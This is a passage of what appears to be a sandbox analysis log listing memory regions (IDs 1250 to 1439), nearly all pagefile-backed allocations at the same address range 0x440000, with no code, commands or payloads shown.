monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1250 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1251 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1252 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1253 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1254 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1255 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1256 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1257 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1258 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1259 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1260 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1261 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1262 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1263 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1264 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1265 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1266 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1267 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1268 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1269 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1270 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1271 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1272 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1273 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1274 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1275 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1276 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1277 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1278 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1279 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1280 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1281 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1282 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1283 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1284 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1285 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1286 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1287 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1288 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1289 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1290 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1291 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1292 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1293 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1294 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1295 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1296 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1297 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1298 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1299 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1300 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1301 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1302 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1303 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1304 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1305 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1306 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1307 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1308 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1309 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1310 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1311 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1312 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1313 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1314 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1315 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1316 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1317 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1318 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1319 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1320 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1321 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1322 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1323 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1324 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1325 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1326 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1327 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1328 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1329 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1330 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1331 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1332 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1333 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1334 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1335 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1336 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1337 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1338 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1339 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1340 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1341 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1342 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1343 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1344 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1345 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1346 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1347 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1348 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1349 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1350 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1351 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1352 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1353 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1354 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1355 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1356 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1357 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1358 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1359 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1360 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1361 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1362 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1363 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1364 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1365 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1366 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1367 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1368 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1369 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1370 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1371 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1372 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1373 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1374 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1375 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1376 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1377 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1378 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1379 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1380 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1381 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1382 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1383 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1384 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1385 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1386 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1387 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1388 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1389 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1390 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1391 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1392 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1393 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1394 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1395 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1396 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1397 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1398 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1399 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1400 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1401 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1402 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1403 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1404 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1405 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1406 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1407 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1408 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1409 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1410 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1411 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1412 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1413 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1414 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1415 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1416 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1417 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1418 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1419 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1420 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1421 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1422 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1423 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1424 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1425 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1426 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1427 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1428 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1429 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1430 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1431 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1432 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1433 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1434 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1435 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1436 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1437 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1438 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1439 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = 